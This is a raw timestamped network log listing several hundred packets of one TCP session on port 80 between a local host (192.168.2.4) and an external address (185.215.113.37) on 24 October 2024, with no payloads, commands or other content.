Oct 24, 2024 19:29:18.134313107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134341955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134341955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134388924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134422064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134438038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134450912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134466887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134476900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134481907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134499073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134510994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134515047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134519100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134531975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134558916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134561062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134583950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134583950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134601116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134618998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134643078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134651899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134655952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134671926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134741068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134752035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134767056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134780884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134792089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134795904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134813070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134824038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134849072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134902954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134917021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134965897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134969950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134987116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134999990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135015011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135027885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135030031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135046959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135060072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135061026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135107994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135108948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135118961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135248899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135262966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135277033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135291100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135292053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135302067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135308981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135330915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135335922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135348082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135363102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135365009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135386944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135402918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135409117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135418892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135442019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135466099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135473967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135489941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135504007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135519028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135523081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135535002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135543108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135550022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135567904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135595083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135607004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135652065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135715961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135730028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135744095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135756016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135761023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135767937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135776043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135787010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135792017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135807037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135812998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135823011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135834932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135874987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135881901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135896921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135921955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135926962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135942936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135956049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135957956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135972023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135974884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.135988951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.135998964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136032104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136236906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136251926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136265993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136281013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136293888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136295080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136311054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136322021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136327028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136342049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136343002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136358976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136368990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136374950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136389971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136396885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136404991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136411905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136421919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136435032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136442900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136467934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136569023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136584044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136598110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136610985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136610985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136637926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136646986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136661053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.136662006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136687994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.136707067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251422882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251451969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251463890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251473904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251485109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251483917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251494884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251506090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251517057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251519918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251519918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251528025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251538992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251544952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251555920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251574993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251596928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251600981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251612902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251616955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251624107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251652956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251674891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251750946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251761913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251770973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251781940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251787901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251801968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251830101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251848936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251859903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251869917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251880884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251895905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251904011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251909018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251921892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251935959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251960993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251965046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251972914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251983881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.251993895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.251993895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252006054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252016068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252027035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252031088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252051115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252073050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252088070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252099037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252114058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252125978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252126932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252141953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252150059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252176046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252192020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252198935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252204895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252214909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252226114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252234936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252242088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252264977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252284050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252310991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252424002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252434015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252444029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252454042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252455950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252464056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252466917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252475023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252485991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252496004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252501965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252509117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252515078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252533913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252558947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252667904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252679110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252687931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252696991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252707005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252712011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252718925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252729893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252738953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252743006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252758026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252774000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252774000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252794981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252806902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252816916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252818108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252830029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252834082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252844095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252855062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252863884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252866030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252877951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252888918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252890110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252907991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252932072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.252938032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252948046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.252984047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253034115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253045082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253053904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253063917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253073931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253092051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253092051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253094912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253108978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253120899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253144026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253151894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253165007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253194094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253277063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253288984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253298044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253309011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253319025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253325939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253329992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253336906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253341913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253351927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253361940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253438950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253438950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253438950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253616095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253628016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253643036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253653049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253654957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253664017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253669977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253676891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253689051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253693104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253712893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253725052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253731966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253736973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253748894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253776073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253798008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253940105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253953934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253967047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253981113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253984928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.253995895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.253997087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.254009962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.254021883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.254029036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.254041910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.254064083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.254081964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.300493956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.300510883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.300523043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.300565958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.300589085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.368659019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368685007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368702888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368746042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.368777990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.368809938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368829012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368863106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.368940115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368957043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368971109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368983030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.368994951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369000912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369012117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369028091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369052887 CEST	49730	80	192.168.2.4	185.215.113.37
